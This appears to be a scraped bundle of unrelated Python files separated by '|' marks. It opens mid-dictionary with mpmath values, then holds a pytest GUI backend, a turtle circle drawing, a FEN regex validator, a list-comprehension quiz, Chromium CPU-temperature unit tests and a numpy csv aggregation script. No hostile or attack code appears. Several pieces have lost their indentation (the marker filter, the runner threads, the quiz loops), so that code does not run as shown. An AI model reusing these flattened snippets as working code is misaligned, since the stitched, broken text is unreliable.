'T4UD[3][1]': mpf('-4629.61358070384390723225768218619'), 'T4UD[3][2]': mpf('-3680.82198440288796241369433789975'), 'T4UD[3][3]': mpf('-8915.04416948626751110253138484779'), 'rho_star': mpc(real='0.0', imag='0.0725005943667336311131421666686947'), 'tau_tilde': 
mpc(real='0.0', imag='988.112144669082681502914056181908'), 'S_tildeD[0]': mpc(real='0.0', imag='-667.479312467258523611235432326794'), 'S_tildeD[1]': mpc(real='0.0', imag='-528.976410074985551545978523790836'), 'S_tildeD[2]': mpc(real='0.0', imag='-960.241626077929595339810475707054'), 'rho_star_fluxU[0]': mpc(real='0.0', imag='0.151157523416274364169709087946103'), 'rho_star_fluxU[1]': mpc(real='0.0', imag='0.0354521203700244244561012862959615'), 'rho_star_fluxU[2]': mpc(real='0.0', imag='0.147324180562029810603874580010597'), 'tau_tilde_fluxU[0]': mpc(real='0.0', imag='-1088.42358066793553916795644909143'), 'tau_tilde_fluxU[1]': mpc(real='0.0', imag='-386.491028479166800480015808716416'), 'tau_tilde_fluxU[2]': mpc(real='0.0', imag='-1149.37616010430565438582561910152'), 'S_tilde_fluxUD[0][0]': mpc(real='0.0', imag='-1867.39022480424227978801354765892'), 'S_tilde_fluxUD[0][1]': mpc(real='0.0', imag='-990.677651365700967289740219712257'), 'S_tilde_fluxUD[0][2]': mpc(real='0.0', imag='-1778.92178390022604617115575820208'), 'S_tilde_fluxUD[1][0]': mpc(real='0.0', imag='-285.054361721301120269345119595528'), 'S_tilde_fluxUD[1][1]': mpc(real='0.0', imag='-875.67789459369396354304626584053'), 'S_tilde_fluxUD[1][2]': mpc(real='0.0', imag='-414.896996035696645321877440437675'), 'S_tilde_fluxUD[2][0]': mpc(real='0.0', imag='-1329.65679972525344965106341987848'), 'S_tilde_fluxUD[2][1]': mpc(real='0.0', imag='-1057.15734041790733499510679394007'), 'S_tilde_fluxUD[2][2]': mpc(real='0.0', imag='-2560.46188157375854643760249018669'), 's_source_term': mpc(real='0.0', imag='-3583.54113198716822807909920811653'), 'S_tilde_source_termD[0]': mpc(real='0.0', imag='-4685.8317475127487341524101793766'), 'S_tilde_source_termD[1]': mpc(real='0.0', imag='-3566.11756884097394504351541399956'), 'S_tilde_source_termD[2]': mpc(real='0.0', imag='-3919.1987609787192923249676823616')}
|
import json
import logging
import os
import subprocess
import sys
from multiprocessing.connection import Listener
from queue import Queue
from threading import Thread
from decouple import config
# Module-level logger for the backend entry point.
logger = logging.getLogger('pytest_gui.backend.main')
# Directory whose tests are discovered/run; env var PYTEST_GUI_TEST_DIR, default cwd.
TEST_DIR = config("PYTEST_GUI_TEST_DIR", default=".")
# A single command-line argument overrides the configured test directory.
if len(sys.argv) == 2:
    if os.path.isdir(sys.argv[1]):
        TEST_DIR = sys.argv[1]
    else:
        raise ValueError(f"{sys.argv[1]} is not a valid directory")
# Port the pytest plugin connects back on; env var PYTEST_GUI_PLUGIN_PORT.
PLUGIN_PORT = config("PYTEST_GUI_PLUGIN_PORT", cast=int, default=6000)
# Dotted path of the plugin injected into pytest via "-p".
PLUGIN_PATH = "pytest_gui.pytest.pytest_gui_plugin"
# Address the multiprocessing Listener binds to (see PytestWorker).
ADDRESS = ('localhost', PLUGIN_PORT)
_builtin_markers = [
"no_cover",
"filterwarnings",
"skip",
"skipif",
"xfail",
"parametrize",
"usefixtures",
"tryfirst",
"trylast",
]
def _filter_only_custom_markers(out):
"""Generator for parse output and return custom markers
Args:
out (str): output of pytest --markers
Yields:
tuple(str, str): contains name and description of the marker
"""
for marker in out:
if marker.startswith("@"):
name = marker.split(":")[0].split(".")[2]
desc = "".join(marker.split(":")[1:]).strip().rstrip(".")
if any(name.startswith(marker) for marker in _builtin_markers):
continue
yield name, desc
class _TestRunner(Thread):
def __init__(self, worker, *args, **kwargs):
super().__init__(*args, **kwargs)
self.worker = worker
def run(self):
try:
while self.worker._cur_tests.poll() is None:
output = self.worker._cur_tests.stdout.readline()
if output != b'':
self.worker.log_queue.put(output.strip())
self.worker._cur_tests.wait()
self.worker._remove_proccess(self.worker._cur_tests.pid)
self.worker._cur_tests = None
self.worker.tests_running = False
self.worker.test_stream_connection = None
except Exception:
if self.worker._cur_tests is not None: # Exception raised not via kill
raise
class _StatusUpdate(Thread):
def __init__(self, worker, *args, **kwargs):
super().__init__(*args, **kwargs)
self.worker = worker
@staticmethod
def _generate_status(conn):
while True:
try:
msg = conn.recv()
except (EOFError, AttributeError):
break
yield msg
def run(self):
for msg in self._generate_status(self.worker.test_stream_connection):
self.worker.status_queue.put(msg)
class PytestWorker:
    """Drive pytest subprocesses for a GUI front-end.

    Spawns pytest with a custom plugin (PLUGIN_PATH) that connects back over
    a multiprocessing Listener; collected tests and live status updates
    arrive on that connection, while raw stdout lines are buffered in
    ``log_queue`` by a _TestRunner thread.
    """

    def __init__(self, test_dir):
        # Directory whose tests are discovered/run.
        self.test_dir = test_dir
        # Cached custom-marker list, filled by get_markers().
        self.markers = None
        # True while a run_tests() invocation is in flight.
        self.tests_running = False
        # Connection streaming per-test status from the plugin, or None.
        self.test_stream_connection = None
        # Popen object of the currently running test process, or None.
        self._cur_tests = None
        self._listener = Listener(ADDRESS)
        # Raw stdout lines from the running pytest process.
        self.log_queue = Queue()
        # Status messages forwarded from the plugin connection.
        self.status_queue = Queue()
        # pid -> Popen for every process this worker has started.
        self._process = {}

    def __del__(self):
        self._listener.close()

    def discover(self):
        """Collect tests via ``pytest --collect-only``.

        Returns:
            The JSON-decoded test list sent by the plugin, or None if pytest
            exited with a non-zero status.
        """
        p, conn = self._run_pytest(self.test_dir, "--collect-only")
        logger.debug(f'Connection accepted from {self._listener.last_accepted}')
        try:
            tests = json.loads(conn.recv())  # Only one message
        finally:
            conn.close()
        p.wait()
        self._remove_proccess(p.pid)
        if p.returncode != 0:
            logger.error(f"Failed to collect tests:\nstdout:\n{p.stdout.read()}\nstderr\n{p.stderr.read()}")
            return None
        logger.info(f"Collected {len(tests)} tests")
        return tests

    def get_markers(self):
        """Return custom markers parsed from ``pytest --markers`` output.

        Caches the result on ``self.markers``; returns None on pytest failure.
        """
        p, _ = self._run_pytest(self.test_dir, "--markers")
        p.wait()
        self._remove_proccess(p.pid)
        if p.returncode != 0:
            logger.error(f"Failed to get markers:\nstdout:\n{p.stdout.read()}\nstderr\n{p.stderr.read()}")
            return None
        # Iterating p.stdout yields the buffered output lines; the parsed
        # description is currently discarded (only the name is kept).
        self.markers = [{"name": name} for name, desc in _filter_only_custom_markers(p.stdout)]
        logger.info(f"Got {len(self.markers)} custom markers")
        return self.markers

    def run_tests(self, tests):
        """Start the given tests asynchronously.

        Args:
            tests: list of dicts, each holding a pytest "nodeid".

        Raises:
            RuntimeError: if *tests* is None.
        """
        if tests is None:
            raise RuntimeError("No tests available")
        self.tests_running = True
        pytest_arg = [test["nodeid"] for test in tests]
        p, conn = self._run_pytest(*pytest_arg)
        self._cur_tests = p
        self.test_stream_connection = conn
        # Background threads pump stdout and plugin status into the queues.
        _TestRunner(self).start()
        _StatusUpdate(self).start()

    def stop_tests(self):
        """Kill the currently running test process and reset run state.

        Raises:
            RuntimeError: if no test run is in progress.
        """
        if self._cur_tests is None:
            raise RuntimeError("No currently running tests")
        # TODO: Race condition?
        self._cur_tests.kill()
        self.tests_running = False
        self.test_stream_connection = None
        self._remove_proccess(self._cur_tests.pid)
        self._cur_tests = None

    def _run_pytest(self, *args):
        """Spawn pytest with the GUI plugin and wait for it to connect back.

        Returns:
            tuple(Popen, Connection): the process and its plugin connection.
        """
        command = ['pytest', "--capture=tee-sys", "-p", PLUGIN_PATH] + list(args)
        logger.info(f"Runing command: {' '.join(command)}")
        my_env = os.environ.copy()
        # Unbuffered output so stdout lines reach the GUI log immediately.
        my_env["PYTHONUNBUFFERED"] = "1"
        p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                             universal_newlines=True, env=my_env)
        logger.debug("Waiting for plugin connection")
        # NOTE(review): accept() blocks; if the plugin fails to start, this
        # hangs here — confirm a timeout is handled by the caller.
        conn = self._listener.accept()
        self._process[p.pid] = p
        return p, conn

    def _remove_proccess(self, pid):
        """Forget a finished process; warn if the pid is unknown."""
        try:
            self._process.pop(pid)
        except KeyError:
            logger.warning(f"Trying to remove non-existing pid {pid}")


# Module-level worker instance used by the backend.
worker = PytestWorker(TEST_DIR)
|
import turtle
import math

bob = turtle.Turtle()


def polygon(t, n, length):
    """Draw a regular *n*-gon with sides of *length* using turtle *t*.

    Bug fix: the body previously drew with the global ``bob`` and ignored
    the *t* parameter, so the function could not be reused with any other
    turtle.
    """
    angle = 360 / n
    for _ in range(n):
        t.fd(length)
        t.lt(angle)


def circle(t, r):
    """Approximate a circle of radius *r* with a many-sided polygon."""
    circumference = 2 * math.pi * r
    # At least 3 sides; roughly one side per 3 units of circumference.
    n = int(circumference / 3) + 3
    length = circumference / n
    polygon(t, n, length)


circle(bob, 80)
turtle.mainloop()
import re
VALIDATOR_REGEX = re.compile(
    r'\s*([rnbqkpRNBQKP1-8]+\/){7}([rnbqkpRNBQKP1-8]+)' +
    r'\s[bw-]\s(([a-hkqA-HKQ]{1,4})|(-))\s(([a-h][36])|(-))\s\d+\s\d+\s*'
)


def validate_fen(fen: str) -> bool:
    """Check the validity of a given FEN string.

    Matches eight '/'-separated rank fields, the side to move, castling
    rights, the en-passant square, and the two move counters.

    NOTE(review): ``match`` only anchors at the start of the string, so
    trailing garbage after the counters is still accepted — confirm whether
    that is intended.
    """
    return VALIDATOR_REGEX.match(fen) is not None
|
"""
# Created on Sat Aug 28 12:52:52 2021
# AI and deep learnin with Python
Control Flow
Quiz List and comprehension
"""
# Problem 1:
"""Use a list comprehension to create a new list first_names containing
just the first names in names in lowercase.
"""
names = ["Rick Sanchez", "Morty Smith", "Summer Smith",
"Jerry Smith", "Beth Smith"]
first_names = [name.split()[0].lower() for name in names]
print(first_names)
# Problem 2:
""" Quiz: Multiples of Three
Use a list comprehension to create a list multiples_3 containing
the first 20 multiples of 3.
"""
# Try 1:
times_3 = []
counter = 0
if counter <= 20:
for i in range(1, 61):
if i % 3 == 0:
times_3.append(i)
counter += 1
print(times_3)
#Try 2
times_3 = []
for i in range(1,21):
times_3.append(i * 3)
print(times_3)
# Try 3
multiples_3 = [i*3 for i in range(1,21) ] # write your list comprehension here
print(multiples_3)
# Problem 3
"""Quiz: Filter Names by Scores
Use a list comprehension to create a list of names passed that only
include those that scored at least 65.
"""
# Try 1
scores = {
"Rick Sanchez": 70,
"Morty Smith": 35,
"Summer Smith": 82,
"Jerry Smith": 23,
"Beth Smith": 98
}
passed = []
list_names = scores.items()
for element in list_names:
name, score = element[0], element[1]
if score >= 65:
passed.append(name)
print(passed)
# Try 2
passed = [name for name, score in scores.items() if score >= 65]
print(passed)
|
#!/usr/bin/env python
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Unit tests for the contents of cpu_temperature.py
"""
# pylint: disable=unused-argument
import logging
import unittest
from devil import devil_env
from devil.android import cpu_temperature
from devil.android import device_utils
from devil.utils import mock_calls
from devil.android.sdk import adb_wrapper
with devil_env.SysPath(devil_env.PYMOCK_PATH):
import mock # pylint: disable=import-error
class CpuTemperatureTest(mock_calls.TestCase):
    """Base fixture: a CpuTemperature built around a mocked 'blueline' device."""

    # NOTE(review): the patch is applied to setUp itself, so PerfControl is
    # only mocked while the fixture is constructed — confirm that is intended.
    @mock.patch('devil.android.perf.perf_control.PerfControl', mock.Mock())
    def setUp(self):
        # Mock the device
        self.mock_device = mock.Mock(spec=device_utils.DeviceUtils)
        self.mock_device.build_product = 'blueline'
        self.mock_device.adb = mock.Mock(spec=adb_wrapper.AdbWrapper)
        # Pretend every thermal file exists so InitThermalDeviceInformation
        # populates the device info.
        self.mock_device.FileExists.return_value = True
        self.cpu_temp = cpu_temperature.CpuTemperature(self.mock_device)
        self.cpu_temp.InitThermalDeviceInformation()
class CpuTemperatureInitTest(unittest.TestCase):
    """Constructor behaviour of cpu_temperature.CpuTemperature."""

    @mock.patch('devil.android.perf.perf_control.PerfControl', mock.Mock())
    def testInitWithDeviceUtil(self):
        device = mock.Mock(spec=device_utils.DeviceUtils)
        device.build_product = 'blueline'
        temp = cpu_temperature.CpuTemperature(device)
        self.assertEqual(device, temp.GetDeviceForTesting())

    def testInitWithMissing_fails(self):
        # Anything that is not a DeviceUtils instance is rejected.
        for bad_device in (None, ''):
            with self.assertRaises(TypeError):
                cpu_temperature.CpuTemperature(bad_device)
class CpuTemperatureGetThermalDeviceInformationTest(CpuTemperatureTest):
    """Tests for thermal-device information lookup."""

    @mock.patch('devil.android.perf.perf_control.PerfControl', mock.Mock())
    def testGetThermalDeviceInformation_noneWhenIncorrectLabel(self):
        invalid_device = mock.Mock(spec=device_utils.DeviceUtils)
        invalid_device.build_product = 'invalid_name'
        c = cpu_temperature.CpuTemperature(invalid_device)
        c.InitThermalDeviceInformation()
        self.assertEqual(c.GetDeviceInfoForTesting(), None)

    def testGetThermalDeviceInformation_getsCorrectInformation(self):
        correct_information = {
            'cpu0': '/sys/class/thermal/thermal_zone11/temp',
            'cpu1': '/sys/class/thermal/thermal_zone12/temp',
            'cpu2': '/sys/class/thermal/thermal_zone13/temp',
            'cpu3': '/sys/class/thermal/thermal_zone14/temp',
            'cpu4': '/sys/class/thermal/thermal_zone15/temp',
            'cpu5': '/sys/class/thermal/thermal_zone16/temp',
            'cpu6': '/sys/class/thermal/thermal_zone17/temp',
            'cpu7': '/sys/class/thermal/thermal_zone18/temp'
        }
        # The original asserted cmp(a, b) == 0, but cmp() was removed in
        # Python 3; comparing the dicts directly is equivalent.
        self.assertEqual(
            correct_information,
            self.cpu_temp.GetDeviceInfoForTesting().get('cpu_temps'))
class CpuTemperatureIsSupportedTest(CpuTemperatureTest):
    """IsSupported() reflects whether the thermal files exist on the device."""

    def _make_temperature(self, file_exists):
        # Build a CpuTemperature around a mocked blueline device whose
        # FileExists check returns *file_exists*.
        device = mock.Mock(spec=device_utils.DeviceUtils)
        device.build_product = 'blueline'
        device.FileExists.return_value = file_exists
        return cpu_temperature.CpuTemperature(device)

    @mock.patch('devil.android.perf.perf_control.PerfControl', mock.Mock())
    def testIsSupported_returnsTrue(self):
        self.assertTrue(self._make_temperature(True).IsSupported())

    @mock.patch('devil.android.perf.perf_control.PerfControl', mock.Mock())
    def testIsSupported_returnsFalse(self):
        self.assertFalse(self._make_temperature(False).IsSupported())
class CpuTemperatureLetCpuCoolToTemperatureTest(CpuTemperatureTest):
    """LetCpuCoolToTemperature polls per-core temperature files until cool."""

    # Return values for the mock side effect: 8 cores read per polling pass.
    cooling_down0 = ([45000 for _ in range(8)] + [43000 for _ in range(8)] +
                     [41000 for _ in range(8)])

    @mock.patch('time.sleep', mock.Mock())
    def testLetBatteryCoolToTemperature_coolWithin24Calls(self):
        self.mock_device.ReadFile = mock.Mock(side_effect=self.cooling_down0)
        self.cpu_temp.LetCpuCoolToTemperature(42)
        self.mock_device.ReadFile.assert_called()
        # assertEquals is a deprecated alias removed in Python 3.12; use
        # assertEqual (same semantics).
        self.assertEqual(self.mock_device.ReadFile.call_count, 24)

    cooling_down1 = [45000 for _ in range(8)] + [41000 for _ in range(16)]

    @mock.patch('time.sleep', mock.Mock())
    def testLetBatteryCoolToTemperature_coolWithin16Calls(self):
        self.mock_device.ReadFile = mock.Mock(side_effect=self.cooling_down1)
        self.cpu_temp.LetCpuCoolToTemperature(42)
        self.mock_device.ReadFile.assert_called()
        self.assertEqual(self.mock_device.ReadFile.call_count, 16)

    constant_temp = [45000 for _ in range(40)]

    @mock.patch('time.sleep', mock.Mock())
    def testLetBatteryCoolToTemperature_timeoutAfterThree(self):
        self.mock_device.ReadFile = mock.Mock(side_effect=self.constant_temp)
        self.cpu_temp.LetCpuCoolToTemperature(42)
        self.mock_device.ReadFile.assert_called()
        self.assertEqual(self.mock_device.ReadFile.call_count, 24)
if __name__ == '__main__':
    # Run the suite directly with debug logging and verbose unittest output.
    logging.getLogger().setLevel(logging.DEBUG)
    unittest.main(verbosity=2)
|
#!/usr/bin/env python2
import os
from argparse import ArgumentParser
from glob import glob
import numpy as np
# Aggregate per-realisation IM csv files into one csv per intensity measure.
parser = ArgumentParser()
parser.add_argument("runs_dir", help="location to Runs folder")
args = parser.parse_args()
# csv_files here only used to find valid directories (faults)
csv_files = glob(os.path.join(args.runs_dir, "*", "IM_calc", "*", "*.csv"))
# Fault name is 4 path components up from the csv file.
im_faults = set(im_csv.split(os.sep)[-4] for im_csv in csv_files)
del csv_files
for fault in im_faults:
    # prepare input files and output dir
    csv_set = glob(os.path.join(args.runs_dir, fault, "IM_calc", "*", "*.csv"))
    out_dir = os.path.join(args.runs_dir, fault, "IM_agg")
    if not os.path.isdir(out_dir):
        os.makedirs(out_dir)
    # within the set, expect the same columns to be available
    with open(csv_set[0], "r") as f:
        columns = f.readline().strip().split(",")
    cols = []
    names = []
    for i, c in enumerate(columns):
        # filter out pSA that aren't round numbers, duplicates
        if not (c.startswith("pSA_") and len(c) > 12 or c in names):
            cols.append(i)
            names.append(c)
    cols = tuple(cols)
    # All IM columns are loaded as single-precision floats.
    dtype = [(n, "f") for n in names]
    # first 2 columns are actually strings
    # NOTE(review): assumes station names fit in 7 bytes and component
    # names in 4 — confirm against the IM_calc output format.
    dtype[0] = ("station", "|S7")
    dtype[1] = ("component", "|S4")
    dtype = np.dtype(dtype)
    # load all at once, assuming enough memory
    csv_np = []
    header = ["station"]
    for csv in csv_set:
        d = np.loadtxt(csv, dtype=dtype, delimiter=",", skiprows=1, usecols=cols)
        # Keep only the geometric-mean component rows.
        csv_np.append(d[d["component"] == "geom"])
        header.append(os.path.splitext(os.path.basename(csv))[0])
    n_csv = len(csv_np)
    n_stat = csv_np[0].size
    # All realisations must list the same stations in the same order.
    for i in range(n_csv - 1):
        assert np.array_equiv(csv_np[i]["station"], csv_np[i + 1]["station"])
    # store outputs
    # Output row: station name followed by one float per realisation.
    dtype = np.dtype(",".join(["|S7"] + ["f"] * n_csv))
    fmt = ",".join(["%s"] + ["%f"] * n_csv)
    header = ",".join(header)
    # One output csv per IM column (skipping the station/component columns).
    for c in names[2:]:
        out_file = os.path.join(out_dir, "%s.csv" % (c))
        out_data = np.zeros(n_stat, dtype=dtype)
        out_data["f0"] = csv_np[0]["station"]
        for i in range(n_csv):
            out_data["f%d" % (i + 1)] = csv_np[i][c]
        np.savetxt(
            out_file, out_data, fmt=fmt, delimiter=",", header=header, comments=""
        )
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.